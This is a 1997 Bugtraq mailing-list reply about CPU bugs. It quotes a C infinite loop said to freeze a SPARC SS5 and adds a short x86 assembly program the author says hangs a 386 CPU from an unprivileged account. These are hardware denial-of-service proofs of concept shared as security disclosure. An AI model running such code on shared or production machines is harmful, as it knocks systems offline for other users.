Bugtraq mailing list archives

Re: Cute SPARC CPU bug

From: dk () GENESYSLAB COM (Dmitry Kohmanyuk Дмитрий Кохманюк)
Date: Fri, 24 Oct 1997 15:40:18 -0700


On Fri, Oct 24, 1997 at 01:42:32PM -0400, Charles M. Hannum wrote:

Compile the following:

main(){while(1);}

with `gcc -O' on a SPARC.  You get, roughly:

L1:
        b,a L1
        retl

Run it on a SS5/170.  Notice the machine is completely wedged.
Power-cycle it.


don't have a SS5 to crash, but just to add to CPU bugs topic...

gcc_compiled.:
.lcomm _c.0,40
.text
        .align 2
.globl _main
_main:
        pushl %ebp
        movl %esp,%ebp
        movl $0,%eax

        pushaw
        popaw
        movl _c.0(%eax,%eax,4),%ebx

        pushl   $0
        call    _exit

        leave
        ret

this hangs 386 CPU solid.  Non-privileged.
Change _main to main to taste.

Ah, my PDP-11 assembly days...

Current thread:

ISS Security Alert X-Force (Oct 22)
- Re: ISS Security Alert Aleph One (Oct 22)
- BSDI termcap exploit Joseph_K (Oct 22)
- Possible SERIOUS bug in open()? Aleph One (Oct 23)
- Cute SPARC CPU bug Charles M. Hannum (Oct 24)
  - Re: Cute SPARC CPU bug Dmitry Kohmanyuk Дмитрий Кохманюк (Oct 24)
  - More info on SPARC CPU bug Charles M. Hannum (Oct 24)
- <Possible follow-ups>
- Re: ISS Security Alert David LeBlanc (Oct 23)